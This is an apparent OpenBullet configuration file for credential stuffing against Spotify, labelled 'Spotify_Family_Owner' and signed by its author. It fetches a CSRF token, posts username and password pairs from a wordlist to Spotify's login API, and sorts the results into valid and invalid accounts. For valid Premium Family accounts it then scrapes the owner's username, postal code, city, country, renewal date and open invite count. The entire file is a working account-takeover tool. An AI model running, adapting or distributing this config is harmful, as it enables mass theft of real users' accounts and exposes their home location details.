[SETTINGS]
{
  "Name": "//Spotify_Family_Owner",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2019-06-22T22:45:50.5870616+01:00",
  "AdditionalInfo": "Patched by me. Let me know if the config needs a fix :P Special thanks to Adamousse <3",
  "Author": "AncientBanana❤️",
  "Version": "1.3.2 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "UserPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST GET "https://accounts.spotify.com/en/login?continue=https:%2F%2Fwww.spotify.com%2Fus%2Faccount%2Foverview%2F" EncodeContent=TRUE 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Token PARSE "<COOKIES(csrf_token)>" LR "" "" -> VAR "CSRF" 

#Login REQUEST POST "https://accounts.spotify.com/api/login" 
  CONTENT "remember=true&username=<USER>&password=<PASS>&csrf_token=<CSRF>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  COOKIE "__bon: MHwwfC0xNDAxNTMwNDkzfC01ODg2NDI4MDcwNnwxfDF8MXwx" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "InvalidCredentials" 
  KEYCHAIN Success OR 
    KEY "displayName" 

#Capture REQUEST GET "https://www.spotify.com/uk/account/subscription/change/" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Capture_Subscription PARSE "<SOURCE>" LR "<h2 class=\"your-plan-name\">" "<" CreateEmpty=FALSE -> CAP "Subscription" 

#Capture_Subscription_Special2 PARSE "<SOURCE>" LR "h3 class=\"product-name\">" "</h3><p class=\"subscription-status\">" CreateEmpty=FALSE -> CAP "Subscription" 

#Capture_Subscription_Special1 PARSE "<SOURCE>" LR "></svg></span>" "</h3><p class=\"subscription-status\">" CreateEmpty=FALSE -> CAP "Subscription" 

#Capture_Subscription_Special3 PARSE "<SOURCE>" LR "<h2 class=\"your-plan-name\">" "<" CreateEmpty=FALSE -> CAP "Subscription" 

#Capture_user_country PARSE "<SOURCE>" LR "'userCountry': '" "'" -> CAP "Country" 

#TU_Country FUNCTION ToUppercase "<Country>" -> CAP "Country" 

#Capture_Renewal PARSE "<SOURCE>" LR "<b class=\"recurring-date\">" "<" CreateEmpty=FALSE -> CAP "Renewal" "" " | By:AncientBanana❤️Adamousse" 

#Capture_Family_Member PARSE "<SOURCE>" LR "<p class=\"your-plan-desc\">You're a m" ".</p>" CreateEmpty=FALSE -> CAP "Note" "M" " | By:AncientBanana❤️Adamousse" 

#Capture_Note PARSE "<SOURCE>" LR "=\"subscription-status\">" "<" CreateEmpty=FALSE -> CAP "Note" "" " | By:AncientBanana❤️Adamousse" 

#Account_Category_Check KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "<Subscription>" Contains "Free" 
    KEY "<Note>" Contains "You're currently Spotify Free" 
  KEYCHAIN Success AND 
    KEY "<Subscription>" Contains "Premium for Family" 
    KEY "<Note>" DoesNotExist 
    KEY "<Subscription>" DoesNotContain "Student" 
  KEYCHAIN Custom "CUSTOM" AND 
    KEY "<Subscription>" Contains "Premium" 
    KEY "<Renewal>" DoesNotExist 

#Family_Overview REQUEST GET "https://www.spotify.com/us/family/overview/" ParseQuery=TRUE 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Magic_Starts_here PARSE "<SOURCE>" LR "familyPlanData: \"\\" "};" CreateEmpty=FALSE -> VAR "FamilyData" 

#Count_+_2 FUNCTION CountOccurrences "postalCode" "<FamilyData>" -> VAR "Count*" 

#Count FUNCTION Compute "<Count*> - 3" -> VAR "Count1" 

#Count_Fix FUNCTION Replace "-2" "0" "<Count1>" -> VAR "Count1" 

#Final_Check KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Retry OR 
    KEY "<Count1>" Contains "-3" 
  KEYCHAIN Failure OR 
    KEY "<Note>" Contains "Free" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<Subscription>" Contains "Student" 

#Capture_Family_Country PARSE "<SOURCE>" LR "familyPlanData: \"\\x7B\\x22country\\x22\\x3A\\x22" "\\x22" CreateEmpty=FALSE -> CAP "Family_Country" 

#Capture_Master_Username PARSE "<SOURCE>" LR "\\x22,\\x22currentUser\\x22\\x3A\\x7B\\x22username\\x22\\x3A\\x22" "\\x22,\\" CreateEmpty=FALSE -> CAP "Master_Username" 

#Capture_Master_Zip_Code PARSE "<SOURCE>" LR "x22postalCode\\x22\\x3A\\x22" "\\x22,\\" CreateEmpty=FALSE -> CAP "Master_Zip" 

#Capture_Master_City PARSE "<SOURCE>" LR "\\x22,\\x22city\\x22\\x3A\\x22" "\\x22,\\x22line1" CreateEmpty=FALSE -> CAP "Master_City" 

#Fix_City_Formatting1 FUNCTION Replace "\\x20" " " "<Master_City>" -> CAP "Master_City" 

#Fix_Zip_Formatting1 FUNCTION Replace "\\x20" " " "<Master_Zip>" -> CAP "Master_Zip" 

#Fix_City_Formatting2 FUNCTION Replace "\\x2D" "-" "<Master_City>" -> CAP "Master_City" 

#Fix_Zip_Formatting2 FUNCTION Replace "\\x2D" "- " "<Master_Zip>" -> CAP "Master_Zip" 

#Invite_Count FUNCTION Constant "<Count1>/5 invites are filled" -> CAP "Invites:" 

